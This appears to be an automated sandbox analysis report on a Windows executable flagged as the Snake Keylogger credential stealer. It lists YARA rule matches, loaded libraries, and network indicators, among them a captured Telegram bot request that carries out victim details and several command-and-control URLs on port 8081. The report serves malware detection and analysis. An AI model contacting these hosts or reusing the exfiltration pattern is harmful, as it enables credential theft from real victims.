Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:123716%0D%0ADate%20and%20Time:%2026/09/2024%20/%2020:05:16%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20123716%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: TLS20242025.exe, 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp |
String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded |
Source: TLS20242025.exe, 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002B11000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://aborters.duckdns.org:8081 |
Source: TLS20242025.exe, 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002B11000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://anotherarmy.dns.army:8081 |
Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002B11000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://checkip.dyndns.org |
Source: TLS20242025.exe, 00000002.00000002.4583576880.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002B11000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://checkip.dyndns.org/ |
Source: TLS20242025.exe, 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp |
String found in binary or memory: http://checkip.dyndns.org/q |
Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002B11000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: TLS20242025.exe, 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002B11000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://varders.kozow.com:8081 |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ac.ecosia.org/autocomplete?q= |
Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://api.telegram.org |
Source: TLS20242025.exe, 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://api.telegram.org/bot |
Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text= |
Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:123716%0D%0ADate%20a |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= |
Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002CD8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://chrome.google.com/webstore?hl=en |
Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002C98000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://chrome.google.com/webstore?hl=enP |
Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002CA2000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://chrome.google.com/webstore?hl=enlB |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://duckduckgo.com/ac/?q= |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://duckduckgo.com/chrome_newtab |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= |
Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002B60000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://reallyfreegeoip.org |
Source: TLS20242025.exe, 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002B60000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://reallyfreegeoip.org/xml/ |
Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002B8A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33 |
Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002B8A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$ |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.ecosia.org/newtab/ |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico |
Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002CD8000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002CC9000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.office.com/ |
Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002CC9000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.office.com/P |
Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002CD3000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.office.com/lB |
Source: 0.2.TLS20242025.exe.3a4fe10.2.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 2.2.TLS20242025.exe.400000.0.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 2.2.TLS20242025.exe.400000.0.unpack, type: UNPACKEDPE |
Matched rule: Detects Encrial credential stealer malware Author: Florian Roth |
Source: 0.2.TLS20242025.exe.3a4fe10.2.unpack, type: UNPACKEDPE |
Matched rule: Detects Encrial credential stealer malware Author: Florian Roth |
Source: 0.2.TLS20242025.exe.3a4fe10.2.unpack, type: UNPACKEDPE |
Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: 2.2.TLS20242025.exe.400000.0.unpack, type: UNPACKEDPE |
Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: 0.2.TLS20242025.exe.3a92840.3.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 0.2.TLS20242025.exe.3a92840.3.unpack, type: UNPACKEDPE |
Matched rule: Detects Encrial credential stealer malware Author: Florian Roth |
Source: 0.2.TLS20242025.exe.3a92840.3.unpack, type: UNPACKEDPE |
Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: 0.2.TLS20242025.exe.3a92840.3.raw.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 0.2.TLS20242025.exe.3a92840.3.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects Encrial credential stealer malware Author: Florian Roth |
Source: 0.2.TLS20242025.exe.3a92840.3.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: 0.2.TLS20242025.exe.3a4fe10.2.raw.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 0.2.TLS20242025.exe.3a4fe10.2.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects Encrial credential stealer malware Author: Florian Roth |
Source: 0.2.TLS20242025.exe.3a4fe10.2.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: 0.2.TLS20242025.exe.3959d70.4.raw.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 0.2.TLS20242025.exe.3959d70.4.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: Process Memory Space: TLS20242025.exe PID: 5748, type: MEMORYSTR |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: Process Memory Space: TLS20242025.exe PID: 5576, type: MEMORYSTR |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: TLS20242025.exe, 00000000.00000000.2128299617.0000000000532000.00000002.00000001.01000000.00000003.sdmp |
Binary or memory string: OriginalFilenamePvI.exe( vs TLS20242025.exe |
Source: TLS20242025.exe, 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenameExample.dll0 vs TLS20242025.exe |
Source: TLS20242025.exe, 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenameRemington.exe4 vs TLS20242025.exe |
Source: TLS20242025.exe, 00000000.00000002.4583281992.0000000000A0E000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenameclr.dllT vs TLS20242025.exe |
Source: TLS20242025.exe, 00000000.00000002.4587810220.0000000005200000.00000004.08000000.00040000.00000000.sdmp |
Binary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs TLS20242025.exe |
Source: TLS20242025.exe, 00000000.00000002.4585419626.000000000297D000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs TLS20242025.exe |
Source: TLS20242025.exe, 00000000.00000002.4585419626.000000000297D000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenameRemington.exe4 vs TLS20242025.exe |
Source: TLS20242025.exe, 00000000.00000002.4587170944.00000000050E0000.00000004.08000000.00040000.00000000.sdmp |
Binary or memory string: OriginalFilenameExample.dll0 vs TLS20242025.exe |
Source: TLS20242025.exe, 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenameRemington.exe4 vs TLS20242025.exe |
Source: TLS20242025.exe, 00000002.00000002.4583338825.00000000009A7000.00000004.00000010.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenameUNKNOWN_FILET vs TLS20242025.exe |
Source: TLS20242025.exe |
Binary or memory string: OriginalFilenamePvI.exe( vs TLS20242025.exe |
Source: 0.2.TLS20242025.exe.3a4fe10.2.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 2.2.TLS20242025.exe.400000.0.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 2.2.TLS20242025.exe.400000.0.unpack, type: UNPACKEDPE |
Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/ |
Source: 0.2.TLS20242025.exe.3a4fe10.2.unpack, type: UNPACKEDPE |
Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/ |
Source: 0.2.TLS20242025.exe.3a4fe10.2.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: 2.2.TLS20242025.exe.400000.0.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: 0.2.TLS20242025.exe.3a92840.3.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 0.2.TLS20242025.exe.3a92840.3.unpack, type: UNPACKEDPE |
Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/ |
Source: 0.2.TLS20242025.exe.3a92840.3.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: 0.2.TLS20242025.exe.3a92840.3.raw.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 0.2.TLS20242025.exe.3a92840.3.raw.unpack, type: UNPACKEDPE |
Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/ |
Source: 0.2.TLS20242025.exe.3a92840.3.raw.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: 0.2.TLS20242025.exe.3a4fe10.2.raw.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 0.2.TLS20242025.exe.3a4fe10.2.raw.unpack, type: UNPACKEDPE |
Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/ |
Source: 0.2.TLS20242025.exe.3a4fe10.2.raw.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: 0.2.TLS20242025.exe.3959d70.4.raw.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 0.2.TLS20242025.exe.3959d70.4.raw.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: Process Memory Space: TLS20242025.exe PID: 5748, type: MEMORYSTR |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: Process Memory Space: TLS20242025.exe PID: 5576, type: MEMORYSTR |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 0.2.TLS20242025.exe.3959d70.4.raw.unpack, DarkListView.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: 0.2.TLS20242025.exe.3a4fe10.2.raw.unpack, -.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: 0.2.TLS20242025.exe.3a92840.3.raw.unpack, -.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: 0.2.TLS20242025.exe.50e0000.5.raw.unpack, DarkListView.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: mscoree.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: apphelp.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: kernel.appcore.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: version.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: vcruntime140_clr0400.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: ucrtbase_clr0400.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: uxtheme.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: wldp.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: amsi.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: userenv.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: profapi.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: msasn1.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: gpapi.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: windows.storage.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: cryptsp.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: rsaenh.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: cryptbase.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: dwrite.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: textshaping.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: textinputframework.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: coreuicomponents.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: coremessaging.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: ntmarta.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: wintypes.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: mscoree.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: kernel.appcore.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: version.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: vcruntime140_clr0400.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: ucrtbase_clr0400.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: uxtheme.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: windows.storage.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: wldp.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: profapi.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: cryptsp.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: rsaenh.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: cryptbase.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: rasapi32.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: rasman.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: rtutils.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: mswsock.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: winhttp.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: ondemandconnroutehelper.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: iphlpapi.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: dhcpcsvc6.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: dhcpcsvc.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: dnsapi.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: winnsi.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: rasadhlp.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: fwpuclnt.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: secur32.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: sspicli.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: schannel.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: mskeyprotect.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: ntasn1.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: ncrypt.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: ncryptsslp.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: msasn1.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: gpapi.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: dpapi.dll |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 922337203685477 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 600000 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 599875 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 599765 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 599656 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 599546 |
